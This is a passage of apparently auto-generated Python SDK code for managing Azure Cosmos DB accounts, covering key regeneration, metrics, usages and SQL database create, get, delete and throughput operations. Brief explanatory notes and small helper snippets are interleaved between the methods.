            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(key_to_regenerate, 'DatabaseAccountRegenerateKeyParameters')

        # Construct and send request
        request = self._client.post(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 202]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response

    def regenerate_key(
            self, resource_group_name, account_name, key_kind, custom_headers=None, raw=False, polling=True, **operation_config):
        """Regenerates an access key for the specified Azure Cosmos DB database
        account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param key_kind: The access key to regenerate. Possible values
         include: 'primary', 'secondary', 'primaryReadonly',
         'secondaryReadonly'
        :type key_kind: str or ~azure.mgmt.cosmosdb.models.KeyKind
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns None or
         ClientRawResponse<None> if raw==True
        :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._regenerate_key_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            key_kind=key_kind,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    regenerate_key.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/regenerateKey'}
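The `regenerate_key` docstring enumerates four accepted `key_kind` values. An illustrative client-side check (not part of the SDK, which accepts either a string or the `KeyKind` enum and lets the service reject unknown values) could be:

```python
# The key kinds listed in the regenerate_key docstring above.
KEY_KINDS = ('primary', 'secondary', 'primaryReadonly', 'secondaryReadonly')


def validate_key_kind(key_kind):
    # Hypothetical helper: fail fast locally instead of waiting for the
    # service to reject an unknown key kind.
    if key_kind not in KEY_KINDS:
        raise ValueError('key_kind must be one of %s' % (KEY_KINDS,))
    return key_kind
```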
    def check_name_exists(
            self, account_name, custom_headers=None, raw=False, **operation_config):
        """Checks whether the Azure Cosmos DB account name already exists. A
        valid account name may contain only lowercase letters, numbers, and
        the '-' character, and must be between 3 and 50 characters.

        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: bool or ClientRawResponse if raw=true
        :rtype: bool or ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = self.check_name_exists.metadata['url']
        path_format_arguments = {
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.head(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 404]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = (response.status_code == 200)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    check_name_exists.metadata = {'url': '/providers/Microsoft.DocumentDB/databaseAccountNames/{accountName}'}
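The account-name constraints that `check_name_exists` (and every other method here) serializes client-side can be expressed as a small predicate. This sketch uses a full-match variant of the serializer's pattern (the original pattern is unanchored on the right) plus the 3-50 length bounds:

```python
import re

# Full-match variant of the serializer pattern r'^[a-z0-9]+(-[a-z0-9]+)*'.
ACCOUNT_NAME_RE = re.compile(r'^[a-z0-9]+(-[a-z0-9]+)*$')


def is_valid_account_name(name):
    # 3-50 characters; lowercase letters and digits, with single hyphens
    # only between alphanumeric groups (no leading/trailing/double hyphens).
    return 3 <= len(name) <= 50 and ACCOUNT_NAME_RE.match(name) is not None
```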
    def list_metrics(
            self, resource_group_name, account_name, filter, custom_headers=None, raw=False, **operation_config):
        """Retrieves the metrics determined by the given filter for the given
        database account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param filter: An OData filter expression that describes a subset of
         metrics to return. The filterable parameters are name.value (the
         metric name; multiple names may be combined with or), startTime,
         endTime, and timeGrain. The supported operator is eq.
        :type filter: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of Metric
        :rtype:
         ~azure.mgmt.cosmosdb.models.MetricPaged[~azure.mgmt.cosmosdb.models.Metric]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        def prepare_request(next_link=None):
            if not next_link:
                # Construct URL
                url = self.list_metrics.metadata['url']
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
                    'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
                }
                url = self._client.format_url(url, **path_format_arguments)

                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
                query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')

            else:
                url = next_link
                query_parameters = {}

            # Construct headers
            header_parameters = {}
            header_parameters['Accept'] = 'application/json'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request

        def internal_paging(next_link=None):
            request = prepare_request(next_link)

            response = self._client.send(request, stream=False, **operation_config)

            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            return response

        # Deserialize response
        header_dict = None
        if raw:
            header_dict = {}
        deserialized = models.MetricPaged(internal_paging, self._deserialize.dependencies, header_dict)

        return deserialized
    list_metrics.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/metrics'}
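A hypothetical helper (not part of the SDK) showing one plausible shape for the `$filter` expression the `list_metrics` docstring describes: metric names are OR-ed on `name.value`, and the time terms are AND-ed, all with the `eq` operator. The exact literal forms (quoting, `duration` prefix) are assumptions for illustration.

```python
def build_metrics_filter(names, start_time, end_time, time_grain):
    # OR the metric names on name.value, then AND in the time-range terms.
    name_clause = ' or '.join("name.value eq '%s'" % n for n in names)
    return (
        "(%s) and startTime eq '%s' and endTime eq '%s'"
        " and timeGrain eq duration'%s'"
        % (name_clause, start_time, end_time, time_grain))
```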
    def list_usages(
            self, resource_group_name, account_name, filter=None, custom_headers=None, raw=False, **operation_config):
        """Retrieves the usages (most recent data) for the given database account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param filter: An OData filter expression that describes a subset of
         usages to return. The supported parameter is name.value (the metric
         name; multiple names may be combined with or).
        :type filter: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of Usage
        :rtype:
         ~azure.mgmt.cosmosdb.models.UsagePaged[~azure.mgmt.cosmosdb.models.Usage]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        def prepare_request(next_link=None):
            if not next_link:
                # Construct URL
                url = self.list_usages.metadata['url']
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
                    'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
                }
                url = self._client.format_url(url, **path_format_arguments)

                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
                if filter is not None:
                    query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')

            else:
                url = next_link
                query_parameters = {}

            # Construct headers
            header_parameters = {}
            header_parameters['Accept'] = 'application/json'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request

        def internal_paging(next_link=None):
            request = prepare_request(next_link)

            response = self._client.send(request, stream=False, **operation_config)

            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            return response

        # Deserialize response
        header_dict = None
        if raw:
            header_dict = {}
        deserialized = models.UsagePaged(internal_paging, self._deserialize.dependencies, header_dict)

        return deserialized
    list_usages.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/usages'}

    def list_metric_definitions(
            self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
        """Retrieves metric definitions for the given database account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of MetricDefinition
        :rtype:
         ~azure.mgmt.cosmosdb.models.MetricDefinitionPaged[~azure.mgmt.cosmosdb.models.MetricDefinition]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        def prepare_request(next_link=None):
            if not next_link:
                # Construct URL
                url = self.list_metric_definitions.metadata['url']
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
                    'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
                }
                url = self._client.format_url(url, **path_format_arguments)

                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

            else:
                url = next_link
                query_parameters = {}

            # Construct headers
            header_parameters = {}
            header_parameters['Accept'] = 'application/json'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request

        def internal_paging(next_link=None):
            request = prepare_request(next_link)

            response = self._client.send(request, stream=False, **operation_config)

            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            return response

        # Deserialize response
        header_dict = None
        if raw:
            header_dict = {}
        deserialized = models.MetricDefinitionPaged(internal_paging, self._deserialize.dependencies, header_dict)

        return deserialized
    list_metric_definitions.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/metricDefinitions'}
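All of the `*Paged` iterators above follow the same pattern: fetch the first page with the full URL and query parameters, then keep following the returned next link until none is returned. Stripped of HTTP and serialization, the loop can be sketched like this (`fetch_page` here is a hypothetical callable standing in for `internal_paging` plus deserialization):

```python
def iterate_pages(fetch_page):
    # Call fetch_page with the previous next link (None on the first call)
    # and yield each item, until a page comes back without a next link.
    next_link = None
    while True:
        page = fetch_page(next_link)
        for item in page['value']:
            yield item
        next_link = page.get('nextLink')
        if not next_link:
            break


# Two stub pages linked by a nextLink, for illustration.
pages = {
    None: {'value': [1, 2], 'nextLink': 'page2'},
    'page2': {'value': [3]},
}
```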
    def list_sql_databases(
            self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
        """Lists the SQL databases under an existing Azure Cosmos DB database
        account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of SqlDatabase
        :rtype:
         ~azure.mgmt.cosmosdb.models.SqlDatabasePaged[~azure.mgmt.cosmosdb.models.SqlDatabase]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        def prepare_request(next_link=None):
            if not next_link:
                # Construct URL
                url = self.list_sql_databases.metadata['url']
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
                    'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
                }
                url = self._client.format_url(url, **path_format_arguments)

                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

            else:
                url = next_link
                query_parameters = {}

            # Construct headers
            header_parameters = {}
            header_parameters['Accept'] = 'application/json'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request

        def internal_paging(next_link=None):
            request = prepare_request(next_link)

            response = self._client.send(request, stream=False, **operation_config)

            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            return response

        # Deserialize response
        header_dict = None
        if raw:
            header_dict = {}
        deserialized = models.SqlDatabasePaged(internal_paging, self._deserialize.dependencies, header_dict)

        return deserialized
    list_sql_databases.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases'}

    def get_sql_database(
            self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
        """Gets the SQL database under an existing Azure Cosmos DB database
        account with the provided name.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param database_name: Cosmos DB database name.
        :type database_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: SqlDatabase or ClientRawResponse if raw=true
        :rtype: ~azure.mgmt.cosmosdb.models.SqlDatabase or
         ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = self.get_sql_database.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'databaseName': self._serialize.url("database_name", database_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('SqlDatabase', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    get_sql_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}'}
    def _create_update_sql_database_initial(
            self, resource_group_name, account_name, database_name, resource, options, custom_headers=None, raw=False, **operation_config):
        create_update_sql_database_parameters = models.SqlDatabaseCreateUpdateParameters(resource=resource, options=options)

        # Construct URL
        url = self.create_update_sql_database.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'databaseName': self._serialize.url("database_name", database_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(create_update_sql_database_parameters, 'SqlDatabaseCreateUpdateParameters')

        # Construct and send request
        request = self._client.put(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 202]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('SqlDatabase', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    def create_update_sql_database(
            self, resource_group_name, account_name, database_name, resource, options, custom_headers=None, raw=False, polling=True, **operation_config):
        """Create or update an Azure Cosmos DB SQL database.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param database_name: Cosmos DB database name.
        :type database_name: str
        :param resource: The standard JSON format of a SQL database
        :type resource: ~azure.mgmt.cosmosdb.models.SqlDatabaseResource
        :param options: A key-value pair of options to be applied for the
         request. This corresponds to the headers sent with the request.
        :type options: dict[str, str]
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns SqlDatabase or
         ClientRawResponse<SqlDatabase> if raw==True
        :rtype:
         ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.SqlDatabase]
         or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.SqlDatabase]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._create_update_sql_database_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            database_name=database_name,
            resource=resource,
            options=options,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            deserialized = self._deserialize('SqlDatabase', response)

            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response

            return deserialized

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    create_update_sql_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}'}
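`_create_update_sql_database_initial` wraps `resource` and `options` into a `SqlDatabaseCreateUpdateParameters` model before serializing it into the PUT body. As a rough, hypothetical sketch of the resulting JSON shape (assumed here for illustration; the authoritative shape is whatever the `SqlDatabaseCreateUpdateParameters` serialization produces), the payload nests both under `properties`, with the database name carried as the resource `id`:

```python
def build_create_update_body(database_name, options=None):
    # Assumed payload shape: resource holds the database id, options is a
    # plain key-value dict of request options (may be empty).
    return {
        'properties': {
            'resource': {'id': database_name},
            'options': options or {},
        }
    }
```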
def _delete_sql_database_initial(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete_sql_database.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete_sql_database(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes an existing Azure Cosmos DB SQL database.

:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: if True, the poller returns ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for a custom polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrest.polling.LROPoller[None] or
~msrest.polling.LROPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_sql_database_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete_sql_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}'}
def get_sql_database_throughput(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
"""Gets the RUs per second of the SQL database under an existing Azure
Cosmos DB database account with the provided name.

:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Throughput or ClientRawResponse if raw=True
:rtype: ~azure.mgmt.cosmosdb.models.Throughput or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_sql_database_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_sql_database_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}/settings/throughput'}
def _update_sql_database_throughput_initial(
self, resource_group_name, account_name, database_name, resource, custom_headers=None, raw=False, **operation_config):
update_throughput_parameters = models.ThroughputUpdateParameters(resource=resource)
# Construct URL
url = self.update_sql_database_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
